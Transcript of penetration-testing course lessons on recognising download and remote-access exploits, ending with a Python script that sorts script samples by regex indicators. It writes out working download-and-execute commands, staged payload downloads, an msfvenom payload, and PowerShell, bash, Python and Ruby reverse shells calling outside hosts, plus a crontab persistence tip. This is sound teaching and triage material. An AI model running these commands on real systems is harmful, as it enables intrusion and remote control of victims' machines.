220. Exploits and Automation (OBJ 5.2)
In this section of the course, we’re going to discuss some different exploits and automations that you can perform using scripting and programming language code during your engagements. Now, as we move throughout this section, we’re going to continue looking at the fifth domain for our exam, which is Tools and Code Analysis. This section of the course will be focused on completing our coverage of Objective 5.2, which states that “Given a scenario, you must analyze a script or code sample for use in a penetration test.” At this point, you should understand the basics of scripting, and you should be able to work your way through reading a sample script that’s written in Bash, PowerShell, Python, Perl, JavaScript or Ruby. So in this section, we’re going to look at a few more examples of scripts and code that may be used with different types of exploits and tasks that you’re going to do during your engagement. First, we’re going to be looking at some exploits that can be used to download files.
Then we’re going to look at some exploits that we can use for gaining remote access to a given system. After that, we’re going to look at exploits for enumerating users and assets that you can use during your engagements. Then we’re going to shift our focus from specific code examples and instead start looking at different tasks that you’re going to be able to automate during your penetration tests. This includes things like the automation of port scans, scripting against IP addresses, and using scripts to automate different functions and tasks using Nmap. There are so many different ways for you to leverage automation in order to make your job easier as a penetration tester during an engagement. So let’s jump back into our coverage of Domain 5, Tools and Code Analysis, with exploits and automation in this section of the course.
221. Exploits to Download Files (OBJ 5.2)
In this lesson, we’re going to talk about some exploits you can use to download files. Now we’re not going to cover all six languages in this lesson. Instead, I just want to bring up a couple of different scripts to show you how easy it is to download files using these different types of exploits. This will allow you to download malware onto a machine, and then you can run that malware to infect that machine to be able to install secondary tools that you may need once you get your initial access. The first one I have is for PowerShell and this will allow you to download and run a script.
The command is: powershell.exe -c "IEX (New-Object System.Net.WebClient).DownloadString('https://malware.com/badstuff.ps1')". Normally when this command is issued, it is all going to be on one line as you see on the bottom of the screen. But to make it big enough for you to be able to read it, I’ve blown it up and separated it across three lines. Now, in the case of this script, what are we doing? Well, we’re using PowerShell to run, with -c, the command IEX (New-Object System.Net.WebClient).DownloadString(...). New-Object System.Net.WebClient opens up a web client, DownloadString fetches the contents of that URL as a string, and IEX (Invoke-Expression) runs whatever that string contains. That URL is a web address that is hosting a .ps1 file, which is a PowerShell file. Now this is pretty obvious because I called it malware.com, but you could just as easily have this at some other website that you control that looks much more innocuous, something like jasonscoolscripts.com. The next one we have is for when you want to download a file and you don’t want to run it immediately. For example, maybe you need to upload some tools and stage all these things so you’re ready to run an exploit later. That’s what you can do with this particular command. Again, it would all be on one line as you see on the bottom of the screen, but I’ve blown it up here to make it a little bit easier to see: powershell.exe -c "(New-Object System.Net.WebClient).DownloadFile('https://malware.com/badstuff.zip', 'C:\Windows\Temp\downloaded.zip')". So what are we doing? We’re reaching out to the server at malware.com and downloading badstuff.zip, and we’re saving it on the local Windows machine that we’ve exploited inside of its Temp directory, calling it downloaded.zip. At that point, we have that file on the system and we can start working through it, using our access to install the tools that are located inside of that file. The third one I want to show you is for Python. If you want to download a file in Python, there’s a little bit more to it.
It takes four lines of code. The first one is import requests, which imports a library that lets you make these types of HTTP connections. The second one is url = followed by the URL you want to use; I’m just setting a variable here. Then I have r = requests.get(url, allow_redirects=True) and then open('downloaded.zip', 'wb').write(r.content). So what are we doing? We’re importing a library. We’re setting a variable for the URL we want to download from, and then we make a request to that URL. If there’s a redirection in place, we follow it until we get to the file we want, which is badstuff.zip. The response comes back in r, and r.content holds the bytes of that file. Then we open a local file called downloaded.zip in binary write mode and write into it all of the content we got from r, the request to that remote URL.
All right, for the exam, what do you need to understand from this lesson? Well, the key thing is that you can use small little scripts to do all sorts of crazy damage. Now, on the exam we’re not expecting you to come up with any of these scripts off the top of your head. But if you see one of these as an example in a question, you should be able to identify its function. If you see one where we’re trying to grab a file, that most likely means you’re trying to download a file to the system, and that is what you’re going to answer on the exam. This is not an enumeration script. This is not a way for us to do password cracking. No, this is downloading a file so we can stage further exploits. And that’s about the level of depth you need to know to answer questions on the exam about this topic.
222. Exploits for Remote Access (OBJ 5.2)
In this lesson, we’re going to look at some exploits for remote access in many different programming languages. First, we have PowerShell. If I want to create a remote access payload in PowerShell, I’m going to use a tool called msfvenom. Now, msfvenom is part of the Metasploit Framework. This tool will allow you to create payloads for different platforms with different operating systems or different chipsets. For example, you can create some for Windows, Linux, Android, and others.
If I want to go after a Windows machine using a PowerShell script, I can use this command right here on my Kali Linux machine: msfvenom -p cmd/windows/reverse_powershell LHOST=<the IP address of my listening host> LPORT=443 > script.ps1. LHOST is the IP address of my listening host, LPORT is the port that I’m going to be listening on, such as 443, and the greater-than sign redirects the output into script.ps1. So what I’m doing is outputting or redirecting the results of this msfvenom command into a script called script.ps1. Once I have that, I’m going to put it on a web server someplace and then use a download exploit to get the victim to download and run that script.
That now gives me a full payload for a reverse PowerShell shell inside of it. Now, the only real problem with using something like this is that the resulting script tends to be pretty large. It’s going to be a couple of hundred lines’ worth of code, and so it may trigger some alert on the system you’re trying to victimize. If you want to do something that’s just native to PowerShell, using a reverse shell script and living off the land, you can do that as well. Here we have a short script that you can see going across six lines on my screen.
In reality, this is actually only one line of code, but I couldn’t fit it on my screen that way, which is why I have it spread across six lines. As you look through it, you’ll see there are a lot of semicolons. So what I’m going to do is make it a little bit easier for us to see and break it apart so that each statement is on its own line; that way we can blow up the text and see it a little bit better. Let’s go ahead and look through the script. First, we have a variable, $client, set to New-Object System.Net.Sockets.TCPClient, followed by an IP address and a port number.
You can probably guess that is going to be the listener set up on my machine, the one I want the victim machine to call out to. Then we have a variable, $stream, set to $client.GetStream(). Next we have a byte buffer: $bytes is set to 0..65535 piped through %{0}, which builds a buffer of 65,536 zero bytes. Next we have a while loop: while $i = $stream.Read($bytes, 0, $bytes.Length) does not return zero, we’re going to do some actions. What are those actions? Well, it’s the next four or five lines here. First, $data is set using New-Object -TypeName System.Text.ASCIIEncoding, whose GetString method converts the bytes we received, $bytes from 0 up to $i, into a string. Then $sendback is set to the result of iex $data piped through Out-String, so the text we received is run as a PowerShell command and its output is captured. Then $sendback2 is set to $sendback plus "PS " plus (pwd).Path plus "> ", which appends a fresh prompt. Then $sendbyte is set to the ASCII-encoded bytes of $sendback2, using [text.encoding]::ASCII.GetBytes, and we call $stream.Write($sendbyte, 0, $sendbyte.Length) and then $stream.Flush(). After the loop ends, $client.Close(). So what is this doing? Well, again, this is going to be a reverse shell.
PowerShell is going to establish a connection using TCP to our listener, in this case 66.67.88.99 over port 443. Then it’s going to start sending data back and forth: anything it gets from the command prompt, from standard input or standard output, is going to be redirected over this connection, and anything coming in over this connection will be redirected back into PowerShell so it can run those commands. We’re going to continue to do that over and over again until we no longer have any data to send, and that connection will then be flushed and closed out. This is a really simple way to do a reverse shell inside of PowerShell. If you think this is easy, wait till you see bash. With bash, we can create a reverse shell in just one line.
In bash, you can just do: bash -i >& /dev/tcp/66.77.88.99/443 0>&1. This is setting up an interactive bash shell; that’s what bash -i does on this Linux system. Then we’re going to redirect both the standard output and the standard error, using that >&, to the device file that connects over TCP to 66.77.88.99 on port 443. Now we get to the second half of this command, where you have 0>&1. What is that doing? Well, it’s redirecting the connection into the standard input of this shell as well, so whatever comes back over the connection is read as commands.
So we now have full two-way communication with this particular system. With this one line, you could put this into something like a crontab, and that way every morning at a certain time it will make a call out to your system listening on port 443 at this IP address. It is a great one-liner that you can use for any Linux server. Next, we have a Python Linux reverse shell. Maybe you don’t want to use bash. Maybe you want to do it in Python. If you do, this short script will do that for you. First, we’re going to create a couple of variables and use the export command to make them global (environment) variables.
So export RHOST=<the IP> and export RPORT=<the port>. Then we have python -c 'import socket,os,pty; ...'. We’re importing three libraries: socket for network connections, os to talk to the operating system, and pty to be able to do terminal emulation. Then we have s = socket.socket(), and then we do s.connect((os.getenv("RHOST"), int(os.getenv("RPORT")))). So what we’re doing in this line is opening up a socket connection to the RHOST and the RPORT that we specified in those global variables.
Then we have [os.dup2(s.fileno(), fd) for fd in (0, 1, 2)] and then pty.spawn("/bin/sh"). So what are we doing? We’re duplicating the socket onto standard input, standard output and standard error, and once we do that, we spawn a /bin/sh shell, which gives us a shell, and we allow that to be a reverse shell back to the RHOST that we just specified. And just to note, this should all be written as one line when entering it at the bash terminal, so it would look more like this than what I just did, but the reason I did it the other way is to make it easier for us to read as we go through it. The next one we’re going to look at is Ruby, and Ruby is even easier than Python when it comes to creating a Linux reverse shell. With Ruby, it’s a single line of code, and you can see it here stretched over two lines on my screen, but it would be entered as a single line. This says: ruby -rsocket -e 'f=TCPSocket.open(IP,port).to_i; exec sprintf("/bin/sh -i <&%d >&%d 2>&%d", f, f, f)'.
What is this doing? Well, this is spawning a /bin/sh shell with the same -i and redirection trick we used earlier from bash, and we’re redirecting our standard input and output, as well as our standard error, to and from the connection we’re creating with this TCP socket going to our remote listener over port 443. Same thing we did earlier with bash, but now we can do it through Ruby. Depending on what languages you have access to, you can do this using a variety of different tools. The final one I want to bring up is using Ruby to do a Windows reverse shell. It looks a lot like the one we just did for Linux, but it is slightly different. Notice the first part is almost identical. In this case, it is: ruby -rsocket -e 'c=TCPSocket.new(IP,port); while(cmd=c.gets); IO.popen(cmd,"r"){|io| c.print io.read} end'.
So what is this doing? It’s basically doing the exact same thing as the Linux reverse shell. The only difference is that instead of launching the bash shell, we’re going to be launching the command prompt, because we’re attacking a Windows system. All right, for the exam. When it comes to looking for exploits for remote access, what are some keys you should be looking for? Well, start looking for anything that says TCP, UDP, or socket.
Anything that really has to do with networking is probably going to be some sort of remote access tool, because you’re trying to establish a connection or create a two-way connection between you and the victimized system. When you’re looking at code on the exam, keep those things in mind. It’ll help you identify that the purpose of that code is remote access. Another giveaway that has to do with remote access is if you see anything like /bin/sh, or something like cmd.exe, ps.exe or powershell.exe, because you’re trying to launch a shell on that system. That means you’re trying to gain two-way remote access to take control of that system using that shell.
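As an added example that is not part of the lecture, here is a small Python script that applies the rules of thumb from this lesson and the previous one to a script sample and reports which category it falls into, the same judgement you make on an exam question or when triaging a suspicious script found on a host. The indicator patterns and the sample snippets are constructed for this example; 203.0.113.5 and files.example are placeholders.

```python
import re

# Heuristic indicator patterns built from the keywords these lessons tell you
# to look for. Constructed for this example; they are triage rules of thumb,
# not a malware signature set, so expect both misses and false positives.
DOWNLOAD = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bwget\b|\bcurl\b"
    r"|requests\.get|urllib\.request", re.IGNORECASE)
NETWORK = re.compile(
    r"/dev/(tcp|udp)/|TCPSocket|TcpClient|socket\.socket|\bsockets?\b"
    r"|pty\.spawn|os\.dup2", re.IGNORECASE)
SHELL = re.compile(
    r"/bin/(ba)?sh|cmd\.exe|powershell\.exe|\bbash\s+-i\b", re.IGNORECASE)
EXECUTE = re.compile(r"\bIEX\b|Invoke-Expression", re.IGNORECASE)


def indicators(sample: str) -> dict:
    """Return every matched keyword, grouped by the behaviour it suggests."""
    found = {}
    for name, rx in (("download", DOWNLOAD), ("network", NETWORK),
                     ("shell", SHELL), ("execute", EXECUTE)):
        hits = sorted({m.group(0) for m in rx.finditer(sample)}, key=str.lower)
        if hits:
            found[name] = hits
    return found


def classify(sample: str) -> str:
    """Lecture rule of thumb: socket plus shell means remote access; a fetch
    primitive means download, and download-and-run if it is fed to IEX."""
    ind = indicators(sample)
    if "network" in ind and "shell" in ind:
        return "remote_access"
    if "download" in ind:
        return "download_and_run" if "execute" in ind else "download"
    return "unknown"


# Constructed snippets shaped like the lecture's examples (placeholder hosts).
SAMPLES = {
    "stage": "powershell.exe -c \"(New-Object System.Net.WebClient).DownloadFile("
             "'https://files.example/tools.zip', 'C:\\Windows\\Temp\\t.zip')\"",
    "run": "powershell.exe -c \"IEX (New-Object System.Net.WebClient)"
           ".DownloadString('https://files.example/s.ps1')\"",
    "bash": "bash -i >& /dev/tcp/203.0.113.5/443 0>&1",
    "python": "import socket,os,pty; s=socket.socket(); ...; pty.spawn('/bin/sh')",
    "benign": "Get-ChildItem C:\\Windows\\Temp | Sort-Object Length",
}

if __name__ == "__main__":
    for label, text in SAMPLES.items():
        print(f"{label:>7}: {classify(text):17} {indicators(text)}")
```

Note that the staged DownloadFile sample still trips the powershell.exe shell indicator; it is the absence of any socket keyword that keeps it in the download bucket, which is exactly the distinction the exam questions turn on.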